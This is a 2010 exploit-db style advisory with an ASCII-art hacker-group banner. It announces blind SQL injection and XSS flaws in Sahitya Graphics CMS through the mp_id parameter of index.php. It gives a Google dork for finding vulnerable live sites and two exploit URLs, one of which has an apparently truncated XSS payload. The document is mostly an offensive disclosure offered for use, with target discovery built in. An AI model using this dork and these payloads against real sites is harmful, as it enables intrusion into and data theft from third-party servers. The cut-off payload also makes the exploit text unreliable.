Exploit Title:Sahitya Graphics CMS Multiple Remote Vulnerabilities Date: 12.10.2010 Author: Dr.0rYX and Cr3w-DZ Category: webapps/0day **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ \ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / \/ /_\ \_ __ \| | | | \ ______ \__ \ | __) \_ __ \ |/ ___\\__ \ * * | | \ \_/ \ | \/| | | Y \ /_____/ / __ \_| \ | | \/ \ \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * \/ \/ \/ \/ \/ \/ \/ * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ __\/ __ \\__ \ / \ * * \___ \\ ___/\ \___| | /| | \/ || | \___ | | | \ ___/ / __ \| Y Y \ * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * \/ \/ \/ \/ \/ \/ \/ * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] Sahitya Graphics CMS Multiple Remote Vulnerabilities [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : sniper-dz@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [!] notice : Dr.0rYX: MY OLD EMAIL VX3@HOTMAIL.DE CLOSED MY NEW EMAIL IS SNIPER-DZ@HOTMAIL.DE ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.sahityagraphics.com.au/ [+] script : Sahitya Graphics CMS [+] Download :http://www.sahityagraphics.com.au/overview.html (sell script ) [+] Vulnerability : BLIND SQL injection Vulnerability / XSS Vulnerability [+] Dork : inurl:"index.php?mp_id=" Sahitya **************************************************************************/ [ Vulnerable File 1] http://server/index.php?mp_id=sql[N.A.S.T ] [ Exploit 1 ] http://server/index.php?mp_id=1 BLIND SQL INJECTION *************************************************************************/ [ Vulnerable File 2] http://server/index.php?mp_id=xss[N.A.S.T ] [ Exploit 2 ] http://www.server/index.php?mp_id='> [ GReet ] [+] : Exploit-db.com , all hackers muslims